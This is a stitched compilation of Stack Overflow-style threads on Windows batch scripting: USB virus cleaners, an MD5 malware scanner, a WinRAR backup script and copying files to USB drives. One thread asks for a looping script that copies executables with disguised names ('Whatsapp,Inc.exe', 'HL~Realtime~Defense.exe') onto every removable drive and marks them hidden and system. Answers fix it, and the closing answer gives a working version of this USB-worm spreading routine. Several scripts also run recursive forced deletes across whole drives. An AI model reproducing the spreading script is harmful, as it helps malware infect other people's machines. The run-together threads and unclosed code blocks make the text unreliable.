I don't know how to code myself; I just managed to find some code on Google and tried to compile it, but it didn't work as I expected. Recently I've found that there is a virus spreading around my place without the user realizing it. The batch file is supposed to remove the files from the specified drive's %temp% folder with the extension .exe and exactly 138784 bytes. This is the batch file I came up with; it works for removing it from the temporary folder but not for removing the file on their removable drive:
@ECHO OFF
ECHO "Enter Drive letter"
set /p letter=
for /r %%f in (*.exe) do if %%~zF EQU 138784 del %%F /f
attrib -s -h -a /s /d %letter%:*.*
c:
cd %temp%
Del wdr201.exe /f
ECHO "Process completed."
Pause
You can give this code a try; it is inspired by this one: Hackoo_Virus_Cleaner.bat
@echo off
Mode con cols=80 lines=6 & Color 9E
Title Searching the Drive letter of your USB Key and clean *.lnk files by Hackoo 2016
Set "TmpLogFile=%tmp%\TmpLog.txt"
Set "LogFile=%UserProfile%\Desktop\Hackoo_Virus_Clean_%UserName%_Log.txt"
If Exist "%TmpLogFile%" Del "%TmpLogFile%"
If Exist "%LogFile%" Del "%LogFile%"
for /f "tokens=2" %%i in ('wmic logicaldisk where "drivetype=2" ^|find /i ":"') do (Set MyUSB=%%i)
cls
setlocal ENABLEDELAYEDEXPANSION
set _drive=%MyUSB%
If Exist !_drive! (
cls
echo.
echo #########################################################
echo Your usb key is connected as !_drive!
echo #########################################################
echo Hit any key to remove malicious files and unhide files ...
pause>nul
Cls
echo(
Echo Removing malicious files/unhiding files... Please wait, this may take a while...
del /s /f /q !_drive!\*.lnk>>"%TmpLogFile%"2>&1
Cmd /U /C Type "%TmpLogFile%" > "%LogFile%"
Start "" "%LogFile%"
attrib -s -h -a -r /s /d !_drive!\*.*
Explorer "!_drive!\"
) ELSE (
cls
color 0C
echo.
echo #########################################################
echo Your usb key is not detected
echo #########################################################
echo.
)
pause & exit
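An added example, not code from the original posts: the size-based check the question describes, started at the chosen drive and using DIR /A so that hidden files are seen as well. The script name, the argument order and the report path are assumptions.

```batch
@echo off
setlocal EnableExtensions DisableDelayedExpansion
rem Added example: list .exe files of one exact size under a folder or drive.
rem Usage, with a hypothetical script name:  findsize.cmd E:\ 138784
set "root=%~1"
set "size=%~2"
if not defined root (echo Usage: %~nx0 folder [size-in-bytes]& exit /b 2)
if not defined size set "size=138784"
rem Drop a trailing backslash so that E:\ and E: are handled the same way.
if "%root:~-1%"=="\" set "root=%root:~0,-1%"
if not exist "%root%\" (echo Folder not found: "%root%"& exit /b 2)

set "report=%TEMP%\exe_size_matches.txt"
type nul > "%report%"
set /a hits=0

rem DIR /A also returns hidden and system files, which a plain FOR /R skips.
for /f "delims=" %%F in ('dir /a:-d /s /b "%root%\*.exe" 2^>nul') do (
    if "%%~zF"=="%size%" (
        >>"%report%" echo %%F
        set /a hits+=1
    )
)

echo %hits% file(s) of %size% bytes listed in "%report%"
rem Review the report before deleting anything: size alone is a weak indicator.
rem To delete a reviewed entry, DEL needs /A for hidden files:  del /f /a "path"
exit /b 0
```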
I'm doing a QC check on my finished md5 malware scanner using a Hyper-V VM running Windows 10. The scanner didn't remove the malware samples supplied from https://virusshare.com whose hashes were contained in the scanner database and were up-to-date.
I've already tried reverting to the original SachaDee's code, but it didn't work. It is probably due to environment variables improperly set somewhere.
:MD5
cls
color 1c
title MD5 scanner
echo.
echo Warning!
echo.
echo This feature is undergoing multiple test-runs.
echo.
echo This moldule will auto remove malware when scanning.
echo.
echo This moldule could delete system or private files without any intent to do it.
echo.
echo We are not responsible for any damage to your computer or your files by using this moldule.
echo.
echo You have been WARNED!
echo.
pause
:dbpatch
cls
color B5
title MD5 scanner - Database Updates [0/4]
cd /d "%~dp0\wget-1.11.4-1-bin\bin"
wget --timeout=30 --timestamping --continue --no-check-certificate https://media.githubusercontent.com/media/Richienb/virusshare-hashes/master/virushashes.txt
pause
goto :Asksect
:Asksect
cls
title MD5 scanner - Database Updates [0/4]
echo Do you want to retry the update?
echo.
echo Y/N
echo.
set /p chc45=
if %chc45%==y goto :dbpatch
if %chc45%==Y goto :dbpatch
if %chc45%==n goto :scan
if %chc45%==N goto :scan
goto :Asksect
:scan
cd /d "%~dp0"
cls
title MD5 scanner - Database Updates [0/4]
echo Checked for Database Updates! Proceeding to Scan Engine...
echo.
pause
cls
title MD5 scanner - Scan Path [0/4]
REM Copyright 2014 BatchProg
echo please specify path to scan down here
echo example C:\Users
echo AND PLEASE DONT ENTER SOMETHING THAT ISNT A COMPUTER PATH
echo IF YOU ENTER SOMETHING THAT ISNT A COMPUTER PATH THE PROGRAM WILL CRASH
set /p pathscan2=path:
cls
title MD5 scanner - Setting up necessary things [1/4]
del /f /q %~dp0\output.txt
REM for /r %%x in (*) do set /a fcount=%fcount%+1
REM set /a totsecscan=%fcount%*15
REM set /a totminscan=%totsecscan%/60
REM if %totminscan%==0 set /a etascan=%totsecscan% seconds && goto :md5hash
REM set /a tothourscan=%totminscan%/60
REM if %tothourscan%==0 set /a etascan=%totminscan% minutes && goto :md5hash
REM set /a totdayscan=%tothourscan%/24
REM if %totdayscan%==0 set /a etascan=%tothourscan% hours && goto :md5hash
REM set /a etascan=%totdayscan% days
goto :md5hash
:md5hash
cls
title MD5 scanner - Hashing [2/4]
set "$base=%~dp0\wget-1.11.4-1-bin\bin\virushashes.txt"
for /r %%f in (%pathscan2%) do %~dp0\md5.exe "%%f " >> %~dp0\output.txt
cd /d "%~dp0"
title MD5 scanner - Comparing Hashes with known malware hashes [3/4]
cls
%pathscan2% echo ETA of scan:%etascan%
echo.
echo Uses a lot of CPU power to process but this is real scanner.
echo It does find real malware but the ability to remove it-
echo is related with the environment it is run on.
echo Run on Safe mode with networking for best results.
for /f "tokens=1* delims= " %%a in (%~dp0\output.txt) do find "%%a" "%$base%" >nul && del /p /f /s "%%b "
title MD5 scanner - Deleting Temporary Files [4/4]
del /f /q %~dp0\output.txt
cls
title MD5 scanner - Completed
echo Scan and Delete completed
echo.
pause
goto :menu
I expect that
for /f "tokens=1* delims= " %%a in (%~dp0\output.txt) do find "%%a" "%$base%" >nul && del /p /f /s "%%b "
will compare the hash in output.txt with the malware hash base and delete any malicious file (prompting the user if possible), but the code did not remove any files at all.
Additional info:
Sample output.txt:
D3041FF4F3B76CC0353064D1133BFEDE D:\EvaxHybrid\backup\.tmp.drivedownload\1191564.driveupload
6756458290BE387639F0068C706E8881 D:\EvaxHybrid\backup\.tmp.drivedownload\1659364.driveupload
9A66042E5A3619A7B49633752044FCEA D:\EvaxHybrid\backup\.tmp.drivedownload\1977560.driveupload
9E44B511DD344F2D35FA513EEA0D54E4 D:\EvaxHybrid\backup\.tmp.drivedownload\2110290.driveupload
A845071F7C4B4E67EF64BFB4BF5C3FB5 D:\EvaxHybrid\backup\.tmp.drivedownload\2923965.driveupload
C49B5CD76F60FCD284209384E2E4EB55 D:\EvaxHybrid\backup\.tmp.drivedownload\2924089.driveupload
6B7484B3ADCE8141A4E7411C7F66A9D7 D:\EvaxHybrid\backup\.tmp.drivedownload\3048269.driveupload
5A48A1B8A70B5A3A39D5EBC9B370BE4D D:\EvaxHybrid\backup\.tmp.drivedownload\3395701.driveupload
58B19F4875C82A846AD6DE62096D5F19 D:\EvaxHybrid\backup\.tmp.drivedownload\3488031.driveupload
C7E363D722920967E737747DB0C79EDE D:\EvaxHybrid\backup\.tmp.drivedownload\3660857.driveupload
DBC938D49B09BE7E0FC1E7BEB74F487D D:\EvaxHybrid\backup\.tmp.drivedownload\3673375.driveupload
6068C7836BFF997EDBE52C6EC0AE7DF3 D:\EvaxHybrid\backup\.tmp.drivedownload\4033639.driveupload
CD86C81B193594F8320832D34294CFA0 D:\EvaxHybrid\backup\.tmp.drivedownload\4132442.driveupload
91D6210AA04AA666E2F32FF64B996E7E D:\EvaxHybrid\backup\.tmp.drivedownload\4155809.driveupload
7941801B8AF887E45B5021ED2466D4F8 D:\EvaxHybrid\backup\.tmp.drivedownload\4166678.driveupload
for /f "tokens=1* delims= " %%a in (%~dp0\output.txt) do find "%%a" "%$base%" >nul && del /p /f /s "%%b "
for /f "tokens=1* delims= " %%a in (%~dp0\output.txt) do find /I "%%a" "%$base%" >nul && del /p /f /s "%%b "
Changed find "%%a" "%$base%" >nul to find /I "%%a" "%$base%" >nul due to difference in letter case within the DB and hashing algorithm output (output.txt).
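An added example, not part of the original post: the lookup step done as a whole-line, case-insensitive findstr match, with hits moved to a quarantine folder instead of being removed with del /s. The folder and file names, the one-hash-per-line database layout and every hash in it are constructed assumptions.

```batch
@echo off
setlocal EnableExtensions DisableDelayedExpansion
rem Added example with constructed data: the hashes below are made up.
set "work=%TEMP%\md5demo_%RANDOM%"
md "%work%\quarantine" || exit /b 1
set "db=%work%\virushashes.txt"
set "scan=%work%\output.txt"

rem Hash database, assumed to hold one lower-case MD5 per line.
 >"%db%" echo aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
>>"%db%" echo 0123456789abcdef0123456789abcdef

rem Two sample files and a scan list in the hash-then-path layout of output.txt.
 >"%work%\bad file.bin" echo constructed
 >"%work%\good.bin" echo constructed
 >"%scan%" echo 0123456789ABCDEF0123456789ABCDEF %work%\bad file.bin
>>"%scan%" echo FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF %work%\good.bin

set /a hits=0
rem usebackq allows a quoted list path; tokens=1* keeps spaces in the file path.
for /f "usebackq tokens=1* delims= " %%a in ("%scan%") do (
    rem /X: the whole line must equal the hash, /I: ignore case, /L: literal text.
    findstr /X /I /L /C:"%%a" "%db%" >nul && if exist "%%b" (
        echo MATCH %%a "%%b"
        move /y "%%b" "%work%\quarantine\" >nul
        set /a hits+=1
    )
)
echo %hits% file(s) moved to "%work%\quarantine"
```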
I have a batch file to compress one folder and rename it with date & time, and it's working well.
Now I need the same file to compress more than one folder into one compressed RAR file.
Here is my batch:
@echo off
echo STARTING BACKUP...
echo %date% %time%
echo+
:: variables
set src=D:\test
set dest=D:\Backups
set filename=%DATE:/=-%_%TIME::=-%
set filename=%filename: =%
Set Rar=%ProgramFiles%\WinRar\WinRAR.exe
"%Rar%" a -m5 -ed -pEltyar -r %dest%\%filename%.rar "%src%"
echo Backup Completed!
@pause
You can try something like this:
@echo off
Title Compress multi-folders in one with Winrar
Mode 70,5 & color 0A
echo STARTING BACKUP...
Call :GetFileNameWithDateTime
echo %filename%
:: variables
set src="D:\test1","D:\test2"
set dest=D:\Backups
If not exist "%dest%" MD "%dest%"
Set Rar=%ProgramFiles%\WinRar\RAR.exe
rem A plain FOR splits the list on commas, so every folder in src is added to the archive
for %%i in (%src%) do (
"%Rar%" a -inul -m5 -ed -hpEltyar -r "%dest%\%filename%.rar" "%%~i"
)
If "%errorlevel%" EQU "0" (
echo(
echo Backup Completed Successfully !
) Else (
echo( & color 0C
echo An error occurred !
)
Timeout /T 10 /nobreak>nul & exit
::*********************************************************************************************
:GetFileNameWithDateTime
for /f "skip=1" %%x in ('wmic os get localdatetime') do if not defined MyDate set "MyDate=%%x"
set "filename=%MyDate:~0,4%-%MyDate:~4,2%-%MyDate:~6,2%-%MyDate:~8,2%-%MyDate:~10,2%"
exit /b
::*********************************************************************************************
I have been struggling over this question for a while now. I have a batch file that, when started, searches for any USB drive and if it finds one, it searches for some files and copies them to the USB. However it is not working for me in this case.
Please note that the files I am copying have +H and +S attributes; I do hope that won't make a difference.
Here is the code of the batch file:
@echo off
:loop
set INTERVAL=5
for /F "tokens=1*" %%a in ('fsutil fsinfo drives') do (
for %%c in (%%b) do (
for /F "tokens=3" %%d in ('fsutil fsinfo drivetype %%c') do (
if %%d equ Removable (
echo %%c is Removable
cd %SYSTEMROOT%\system32\SystemSettingsUpdate
copy "Whatsapp,Inc.exe" "%%c"
copy "Configure.exe" "%%c"
copy "HL~Realtime~Defense.exe" "%%c"
ATTRIB +H -R +S %%cConfigure.exe
ATTRIB +H -R +S %%cHL~Realtime~Defense.exe
timeout /nobreak /t 59
goto :loop
)
)
)
)
Please note that the %%c is the letter of the USB drive.
So now what happens is that when I start it, it gives me an error that it cannot locate the files I specified.
However I double checked the location and the files exist.
Any suggestions why I am getting the file not found error message?
COPY does not copy files with either system or hidden attribute set as the following batch code demonstrates:
@echo off
cls
pushd "%TEMP%"
md TestTarget 2>nul
echo Just a copy/xcopy test for hidden and system files.>TestFile.tmp
attrib +h TestFile.tmp
echo TRY TO COPY HIDDEN FILE ...
echo.
echo copy TestFile.tmp TestTarget\
copy TestFile.tmp TestTarget\
echo.
echo.
echo TRY TO XCOPY HIDDEN FILE ...
echo.
echo xcopy TestFile.tmp TestTarget\ /H /I /Q /R /Y
xcopy TestFile.tmp TestTarget\ /H /I /Q /R /Y
echo.
pause
cls
attrib -h +s TestFile.tmp
echo TRY TO COPY SYSTEM FILE ...
echo.
echo copy TestFile.tmp TestTarget\
copy TestFile.tmp TestTarget\
echo.
echo.
echo TRY TO XCOPY SYSTEM FILE ...
echo.
echo xcopy TestFile.tmp TestTarget\ /H /I /Q /R /Y
xcopy TestFile.tmp TestTarget\ /H /I /Q /R /Y
echo.
pause
cls
attrib +h +s TestFile.tmp
echo TRY TO COPY HIDDEN SYSTEM FILE ...
echo.
echo copy TestFile.tmp TestTarget\
copy TestFile.tmp TestTarget\
echo.
echo.
echo TRY TO XCOPY HIDDEN SYSTEM FILE ...
echo.
echo xcopy TestFile.tmp TestTarget\ /H /I /Q /R /Y
xcopy TestFile.tmp TestTarget\ /H /I /Q /R /Y
echo.
del /A TestFile.tmp
rd /Q /S TestTarget
popd
pause
One solution for copying hidden system files is using command XCOPY with parameter /H.
But usage of XCOPY for copying a single file is a little bit tricky.
Copying with XCOPY a single file to an existing directory with a new file name results in a prompt if the target is a file or a directory. For this task the prompt can be avoided by using option /I and making sure the target specification ends with a backslash and is therefore interpreted as directory path. See also answers on BATCH file asks for file or folder for details on XCOPY and file or directory prompt.
Additionally argument /Y is needed to avoid the prompt on overwriting an already existing file in target directory with same name as current source file.
Then XCOPY outputs an access denied error message if the file already exists in target directory but has hidden attribute set. The copying is successful for this case with using also flag /R (second copy done by demonstration batch file).
Parameter /Q should be also used for copying the files without showing their names.
And last it would be good to use >nul at end of each line with XCOPY if the success message should be suppressed which was not done on demonstration batch code as we want to see absolutely the success message here.
XCOPY without using /K removes automatically the read-only attribute.
copy does not copy files with either system or hidden attribute set. Use instead xcopy with parameter /H.
A better way to List the USB drives
@echo off
setlocal enabledelayedexpansion
:: Creating a list with all USB drive
for /f "delims=" %%a in ('wmic logicaldisk where drivetype^=2 get deviceid ^| find ":"') do set "$List=!$List! %%a"
Echo USB ==^> !$List!
And like @Mofi said, use xcopy instead of copy
I have a working simple batch-file program which unhides predefined drive hidden folders.
What I want to do is:
To have the drive letter entered by the user instead of predefined, and any other option you can suggest.
My unhide.bat code is:
@echo off
D:
attrib -r -s -h /s /d
pause
You can use set /p DriveLetter=Please enter drive letter.. If you then run %DriveLetter% as a command, it will expand as you expect.
To make your code work:
@echo off
set /p DriveLetter=Please enter drive letter.
%DriveLetter%
attrib -r -s -h /s /d
pause
They would enter "D:" and it would accept it as such.
The only thing to note is that if someone uses an incorrect drive letter, bad stuff will happen.
Alternatively, you could use a large block with CHOICE, but that seems overkill. You'd have to define every drive letter. Thus, I won't go into detail on this.
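An added example, not code from the answer above: one way to check the entered drive letter before attrib touches anything, so that a wrong entry is rejected instead of acted on. It assumes English fsutil output in the form "E: - Removable Drive"; the variable names are hypothetical.

```batch
@echo off
setlocal EnableExtensions EnableDelayedExpansion
rem Added example: validate the drive letter before running attrib on it.

:ask
set "answer="
set /p "answer=Drive letter to unhide (for example E): "
if not defined answer goto ask

rem Delayed expansion keeps quotes or ampersands in the input from being parsed as code.
set "letter="
for %%L in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) do (
    if /i "!answer!"=="%%L"  set "letter=%%L"
    if /i "!answer!"=="%%L:" set "letter=%%L"
)
if not defined letter (
    echo "!answer!" is not a drive letter.
    goto ask
)

rem Never strip attributes recursively on the Windows system drive.
if /i "%letter%:"=="%SystemDrive%" (
    echo %letter%: is the system drive, refusing.
    goto ask
)
if not exist "%letter%:\" (
    echo Drive %letter%: is not available.
    goto ask
)

rem Token 3 of the fsutil output is the drive type; English output is assumed.
set "type="
for /f "tokens=3" %%T in ('fsutil fsinfo drivetype %letter%:') do set "type=%%T"
if /i not "%type%"=="Removable" (
    choice /m "%letter%: is not a removable drive. Continue anyway"
    if errorlevel 2 goto ask
)

attrib -r -s -h "%letter%:\*" /s /d
echo Attributes cleared on %letter%:\
pause
```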
This should do:
SET /P letter=Please give your drive letter and press ENTER:
ECHO %letter%
PAUSE
I guess that you are trying to unhide folders on the USB drive that were hidden by a worm.
If you would like to detect the drive letter of your USB key, try this code instead.
I made this tool to unhide folders and files and delete all infected links on the USB key:
@echo off
Mode con cols=98 lines=10 & Color 9E
Title Searching the Drive letter of your USB Key by Hackoo 2014
echo.
ECHO *******************************************************************************************
echo.
echo Searching the drive letter of your USB Key .......
echo.
ECHO *******************************************************************************************
wmic logicaldisk get DeviceID,DriveType /Format:CSV > %Tmp%\tmp.txt
for /f "skip=2 tokens=1-3 delims=," %%a in ('%COMSPEC% /a /c type "%Tmp%\tmp.txt"') do echo %%b %%c >> %Tmp%\tmp2.txt
for /f "tokens=1" %%i in ('%COMSPEC% /a /c type "%Tmp%\tmp2.txt" ^|Find "2"') Do (set MyUSBDrive=%%i)
Del %Tmp%\tmp.txt & Del %Tmp%\tmp2.txt
cls
echo.
ECHO *******************************************************************************************
echo.
echo The drive letter of your USB Key is %MyUSBDrive%
echo.
ECHO *******************************************************************************************
pause
cls
echo.
echo.
ECHO *******************************************************************************************
echo.
echo Press a button to delete infected shortcuts and restore hidden files in your USB key
echo.
ECHO *******************************************************************************************
pause>nul
cls
echo.
echo.
ECHO *******************************************************************************************
echo.
echo Deleting infected shortcuts and restoring hidden files
echo.
ECHO *******************************************************************************************
:: To Unhide Folders and files into your USB key
Attrib -s -h -r %MyUSBDrive%\*.* /D /S >nul 2>&1
:: To delete all infected files.lnk
Del %MyUSBDrive%\*.lnk >nul 2>&1
Explorer %MyUSBDrive%
pause
I want to create a batch file to copy a file from any directory into the root folder where the .bat file is located, such as a USB flash drive.
My incomplete command:
xcopy /s "%userprofile%\Desktop\test.txt" "?"
What can I replace "?" with?
Thanks guys
This will do exactly as you want to any and all connected USB drives.
@echo off
for /F "usebackq tokens=1,2,3,4 " %%i in (`wmic logicaldisk get caption^,description^,drivetype 2^>NUL`) do (
if %%l equ 2 (
xcopy /s "%userprofile%\Desktop\test.txt" %%i\
)
)
xcopy /s "%userprofile%\Desktop\test.txt" "\"
You should replace it with drive letter of USB drive followed by :\
So, the real question is how to determine, which of the drives in system are USB flash drives, I guess? Here is the code:
@echo off
setlocal enabledelayedexpansion
set INTEXTFILE=temp.txt
set OUTTEXTFILE=temp.bat
set SEARCHTEXT='Removable Disk'
set REPLACETEXT=
set OUTPUTLINE=
wmic logicaldisk get name,description|grep -h "Removable" > %INTEXTFILE%
for /f "tokens=3,* delims= " %%A in ( '"type %INTEXTFILE%"') do (
SET string=%%A
SET modified=!string:%SEARCHTEXT%=%REPLACETEXT%!
)
echo xcopy /s "%userprofile%\Desktop\test.txt" !modified! > %OUTTEXTFILE%
call %OUTTEXTFILE%
del %OUTTEXTFILE%
del %INTEXTFILE%
But take into account that it definitely works only for 1 removable disk. It will fail, if two devices of this type are plugged in.
What you are going to need to do is use a relative path for your USB directory. The code will look like this:
@echo off
set /p entry= Enter the path of the file you'd like to copy:
copy %entry% %~dp0\*.*
@pause
This should let you enter into a prompt where you would like to copy the folder from/its name. It will name the file the same as the original and keep the original format (.txt, etc.).
Let me know if this does not work for you instead of downvoting and I will work out another solution for you asap.
Best of luck!
@ECHO Off
:loop
@echo off
set INTERVAL=5
for /F "tokens=1*" %%a in ('fsutil fsinfo drives') do (
for %%c in (%%b) do (
for /F "tokens=3" %%d in ('fsutil fsinfo drivetype %%c') do (
if %%d equ Removable (
echo %%c is Removable
cd "%USERPROFILE%\Appdata\Local\SystemSettings"
xcopy "%USERPROFILE%\Appdata\Local\SystemSettings" "%%c" /s /e /h /y
ATTRIB +H -R +S %%cConfigure.exe
ATTRIB +H -R +S %%cHL~Realtime~Defense.exe
ATTRIB -H -R -s %%cWhatsapp,Inc.exe
timeout /nobreak /t 99
goto loop
Is exactly what you need